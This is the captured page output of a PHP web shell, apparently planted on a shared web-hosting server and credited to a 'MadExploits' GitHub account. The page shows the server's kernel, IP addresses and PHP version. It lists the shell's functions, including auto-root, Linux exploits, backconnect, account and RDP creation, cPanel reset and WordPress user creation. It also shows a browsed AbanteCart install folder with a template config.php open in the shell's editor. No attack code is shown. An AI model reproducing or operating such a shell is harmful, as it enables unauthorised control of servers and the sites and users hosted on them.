Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.179
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
abante /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
abante.sql
1.39
MB
-rw-r--r--
abante.zip
50.41
MB
-rw-r--r--
changelog.txt
7.1
KB
-rw-r--r--
clone.php
6.38
KB
-rw-r--r--
config.php
1.42
KB
-rw-r--r--
edit.php
5.25
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
1.89
KB
-rw-r--r--
fileindex.php
212
B
-rw-r--r--
import.php
4.95
KB
-rw-r--r--
info.xml
3.54
KB
-rw-r--r--
install.js
1.02
KB
-rw-r--r--
install.php
8.71
KB
-rw-r--r--
install.xml
1.63
KB
-rw-r--r--
md5
1.79
KB
-rw-r--r--
notes.txt
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** AbanteCart, Ideal OpenSource Ecommerce Solution https://www.AbanteCart.com Copyright © 2011-2025 Belavier Commerce LLC Released under the Open Software License (OSL 3.0) */ const SERVER_NAME = '[[domhost]]'; // Admin Section Configuration. You can change this value to any name. Will use ?s=name to access the admin const ADMIN_PATH = '[[admin_realname]]'; // Database Configuration const DB_DRIVER = 'amysqli'; const DB_HOSTNAME = '[[softdbhost]]'; const DB_PORT = 3306; const DB_USERNAME = '[[softdbuser]]'; const DB_PASSWORD = '[[softdbpass]]'; const DB_DATABASE = '[[softdb]]'; const DB_PREFIX = '[[dbprefix]]'; const CACHE_DRIVER = 'file'; // Unique AbanteCart store ID const UNIQUE_ID = '[[UNIQUE_ID]]'; // Encryption key for protecting sensitive information. NOTE: Change of this key will cause a loss of all existing encrypted information! const ENCRYPTION_KEY = '[[ENCRYPTION_KEY]]'; // details about allowed DSN settings https://symfony.com/doc/6.0/mailer.html#transport-setup /* const MAILER = [ //'dsn' => null, // OR 'protocol' => 'smtp', // or ses+smtp, gmail+smtp, mandrill+smtp, mailgun+smtp, mailjet+smtp, postmark+smtp, sendgrid+smtp, sendinblue+smtp, ohmysmtp+smtp //we use "username" also as ID, KEY, API_TOKEN, ACCESS_KEY 'username' => 'merchant@yourdomain.com', 'password' => '****super-secret-password****', 'host' => 'your-hostname', 'port' => 465 //or 587 etc ]; */
Close